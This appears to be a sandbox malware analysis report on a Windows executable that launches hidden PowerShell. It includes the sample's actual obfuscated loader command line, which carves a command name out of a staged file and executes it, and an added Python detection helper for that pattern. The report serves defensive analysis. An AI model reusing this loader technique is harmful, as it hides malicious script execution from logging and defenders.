Analysis
- max time kernel: 118s
- max time network: 120s
- platform: windows7_x64
- resource: win7-20240903-en
- resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
- submitted: 18/10/2024, 02:00
Static task
- static1
Behavioral tasks
- behavioral1: sample 7821d35c1866a3ecd43b15d6a171fd9f11d70907105cc27f6b7f0760ca86bccd.exe, resource win7-20240903-en (the task this report covers)
- behavioral2: sample 7821d35c1866a3ecd43b15d6a171fd9f11d70907105cc27f6b7f0760ca86bccd.exe, resource win10v2004-20241007-en
- behavioral3: sample Variabelforklaringen.ps1, resource win7-20241010-en
- behavioral4: sample Variabelforklaringen.ps1, resource win10v2004-20241007-en
General
- Target: 7821d35c1866a3ecd43b15d6a171fd9f11d70907105cc27f6b7f0760ca86bccd.exe
- Size: 738KB
- MD5: 884358a9e9da158f576b7b7e42521d70
- SHA1: a9d488b27fc2d65df89c1049c9cdf380e37e435f
- SHA256: 7821d35c1866a3ecd43b15d6a171fd9f11d70907105cc27f6b7f0760ca86bccd
- SHA512: 630c905e255424dc8e54a8b945aaa5673e6ff25fe4e2f9713b73a3f5a622ff8f5d33bfc06ccecd85e5017bac27e31007c878acba32af509000a6c51fdaea0216
- SSDEEP: 12288:javPpBdFOdWbKSYQNGHkROyGOs61IYZVAecgs9FMa1Mdq8jJN:javzLDK+NjDGMIYO7MoON
Malware Config
Signatures
- Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)
  Runs PowerShell with its console window hidden (-windowstyle hidden).
  pid   process
  2488  powershell.exe
  1652  powershell.exe
- Drops file in Windows directory (1 IoC)
  description                   ioc                                         process
  File opened for modification  C:\Windows\resources\0409\Grubstaking.bro  7821d35c1866a3ecd43b15d6a171fd9f11d70907105cc27f6b7f0760ca86bccd.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery (1 TTP, 3 IoCs)
  Attempts to gather information about the system language of the victim in order to infer the geographical location of the host. This key is also read by much ordinary locale-aware software, so on its own it is a weak indicator.
  description  ioc                                                           process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  7821d35c1866a3ecd43b15d6a171fd9f11d70907105cc27f6b7f0760ca86bccd.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   process
  1652  powershell.exe
  2488  powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description              pid   process
  Token: SeDebugPrivilege  1652  powershell.exe
  Token: SeDebugPrivilege  2488  powershell.exe
- Suspicious use of WriteProcessMemory (8 IoCs)
  description                        pid   process                                                                   procid_target
  PID 2028 wrote to memory of 2488   2028  7821d35c1866a3ecd43b15d6a171fd9f11d70907105cc27f6b7f0760ca86bccd.exe  31  (4 identical entries)
  PID 2028 wrote to memory of 1652   2028  7821d35c1866a3ecd43b15d6a171fd9f11d70907105cc27f6b7f0760ca86bccd.exe  33  (4 identical entries)
  Every recorded write goes from the sample (PID 2028) into one of the two powershell.exe children it spawns (PIDs 2488 and 1652); no write into a pre-existing or unrelated process appears in this run.
Processes
- C:\Users\Admin\AppData\Local\Temp\7821d35c1866a3ecd43b15d6a171fd9f11d70907105cc27f6b7f0760ca86bccd.exe (PID 2028)
  command line: "C:\Users\Admin\AppData\Local\Temp\7821d35c1866a3ecd43b15d6a171fd9f11d70907105cc27f6b7f0760ca86bccd.exe"
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2488, child of 2028)
    command line: "powershell.exe" -windowstyle hidden "$supportable=Get-Content -raw 'C:\Users\Admin\AppData\Local\Temp\superincomprehensible\Variabelforklaringen.Adi';$Svinehundens=$supportable.SubString(52555,3);.$Svinehundens($supportable)"
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1652, child of 2028)
    command line: identical to PID 2488 above
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

What the PowerShell launch line does: it reads the staged file Variabelforklaringen.Adi into a single string (Get-Content -raw), carves the three characters at offset 52555 out of that string, and uses the dot-source operator to invoke whatever command those three characters name, passing the entire file content as its argument. The actual script body therefore never appears on the command line; process-creation logging (Security 4688, Sysmon event 1) only captures this stub, while PowerShell script block logging (event 4104), where available, records what the invoked command evaluates. The report does not include the .Adi file, so the carved command name cannot be recovered from this page. Both children are the 32-bit PowerShell host under SysWOW64.
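One way to turn the launch line above into a detection and a recovery step, as an added example that is not part of the tria.ge report and not the sample's own code: it flags the combination seen here (hidden window, Get-Content on a non-script extension, a few characters carved from a large offset, and that carved string invoked as a command) over constructed command lines, and applies the recorded offset/length to a staged file an analyst has in hand. The indicator names, thresholds, every sample line other than the report's own, and the stand-in file content are assumptions.

```python
"""Triage helper for the PowerShell loader pattern shown in the process tree above.

Added example for this report; it is not tria.ge output and not the sample's own code.
Indicator names, thresholds and every command line except REPORT_CMDLINE are constructed.
"""
import ntpath
import re
from typing import Dict, List, Optional, Tuple

# The launch line recorded in the report (PIDs 2488 and 1652 use the same one).
REPORT_CMDLINE = r'''"powershell.exe" -windowstyle hidden "$supportable=Get-Content -raw 'C:\Users\Admin\AppData\Local\Temp\superincomprehensible\Variabelforklaringen.Adi';$Svinehundens=$supportable.SubString(52555,3);.$Svinehundens($supportable)"'''

# Constructed log lines: one benign, one merely hidden, one variant of the same loader.
SAMPLE_CMDLINES = [
    REPORT_CMDLINE,
    r'''"powershell.exe" -NoProfile -File C:\Scripts\nightly-backup.ps1''',
    r'''"powershell.exe" -w hidden -File C:\Scripts\nightly-backup.ps1''',
    r'''"powershell.exe" -w hidden "$c=Get-Content -raw 'C:\Users\Public\notes.txt';$i=$c.SubString(4096,3);&$i($c)"''',
]

# -windowstyle / -win / -w hidden: powershell.exe accepts any unambiguous prefix.
HIDDEN_WINDOW = re.compile(r"-w[a-z]*\s+hidden", re.IGNORECASE)
# Get-Content and its arguments up to the next statement separator.
GET_CONTENT = re.compile(r"Get-Content\b([^;]*)", re.IGNORECASE)
QUOTED_PATH = re.compile(r"""['"]([^'"]+)['"]""")
# $name = $source.SubString(offset, length)
CARVE = re.compile(r"\$(\w+)\s*=\s*\$(\w+)\.SubString\(\s*(\d+)\s*,\s*(\d+)\s*\)", re.IGNORECASE)
# .$name(  or  &$name(  : the value of a variable used as the command to run
INVOKE_VAR = re.compile(r"[.&]\s*\$(\w+)\s*\(")

SCRIPT_EXTS = {".ps1", ".psm1", ".psd1"}
MAX_CARVED_LEN = 4       # assumed: a cmdlet alias such as a 3-letter one fits in this
MIN_CARVE_OFFSET = 1024  # assumed: carving from deep inside the file, not its header


def analyze_cmdline(cmd: str) -> Dict[str, object]:
    """Return the indicators matched by one powershell.exe command line."""
    findings: List[str] = []
    source: Optional[str] = None
    carve: Optional[Tuple[str, int, int]] = None

    if HIDDEN_WINDOW.search(cmd):
        findings.append("hidden_window")

    m = GET_CONTENT.search(cmd)
    if m:
        q = QUOTED_PATH.search(m.group(1))
        if q:
            source = q.group(1)
            if ntpath.splitext(source)[1].lower() not in SCRIPT_EXTS:
                findings.append("get_content_non_script_ext")

    m = CARVE.search(cmd)
    if m:
        carve = (m.group(1), int(m.group(3)), int(m.group(4)))
        if carve[2] <= MAX_CARVED_LEN and carve[1] >= MIN_CARVE_OFFSET:
            findings.append("short_command_carved_from_large_offset")

    m = INVOKE_VAR.search(cmd)
    # PowerShell variable names are case-insensitive, so compare them that way.
    if m and carve and m.group(1).lower() == carve[0].lower():
        findings.append("carved_string_invoked_as_command")

    return {"findings": findings, "source": source, "carve": carve}


def triage(lines: List[str], min_findings: int = 3) -> List[Tuple[str, List[str]]]:
    """Keep only command lines that match at least min_findings indicators."""
    hits = []
    for line in lines:
        result = analyze_cmdline(line)
        if len(result["findings"]) >= min_findings:
            hits.append((line, result["findings"]))
    return hits


def recover_invoked_command(cmd: str, staged_text: str) -> Optional[str]:
    """Apply the SubString(offset, length) from cmd to the staged file's text.

    Get-Content -raw hands PowerShell a .NET string, so SubString counts UTF-16
    code units; decode the file the way the host would (ANSI without a BOM on
    Windows PowerShell 5.1) before calling this. For ASCII content the indexes
    coincide with Python's str indexing.
    """
    m = CARVE.search(cmd)
    if not m:
        return None
    offset, length = int(m.group(3)), int(m.group(4))
    if offset + length > len(staged_text):
        return None  # SubString would throw ArgumentOutOfRangeException here
    return staged_text[offset:offset + length]


# Constructed stand-in for the staged file: the real Variabelforklaringen.Adi is
# not in the report, so this says nothing about what the sample actually carves.
CONSTRUCTED_STAGED = "#" * 52555 + "iex" + "\n# payload body would follow\n"

if __name__ == "__main__":
    for line, found in triage(SAMPLE_CMDLINES):
        print(found, line[:60])
    print(recover_invoked_command(REPORT_CMDLINE, CONSTRUCTED_STAGED))
```

The three-indicator threshold is deliberate: a hidden window or a Get-Content on a .txt file is common in benign automation, but the carve-and-invoke pair almost never is, so the combination is what the rule keys on. recover_invoked_command is only meaningful once the staged file has been pulled from the host or the sandbox; the report itself does not contain it.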
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  Filesize: 7KB
  MD5: 5806dd633468971d3469bdd121e2b2ca
  SHA1: 337badccf843962880fe270623807d8a466c306d
  SHA256: a36b736eef18712c52ed04d5f19fa68bc2e3ad7df304f3448accd35aa27f70f4
  SHA512: 3c5a805e4d6c4e1cb02fc8a3fb313c4588e1bf3575c265acae9a46a55151fa06d9f4d28ab3941c6c0f45564f33b4272de3b907f66890023d492d5085a4516630
  This is a Windows jump-list file under the user's Recent folder, which the shell writes as a side effect of file and program activity; treat its hashes as a sandbox artifact rather than a payload indicator unless the file's contents are examined.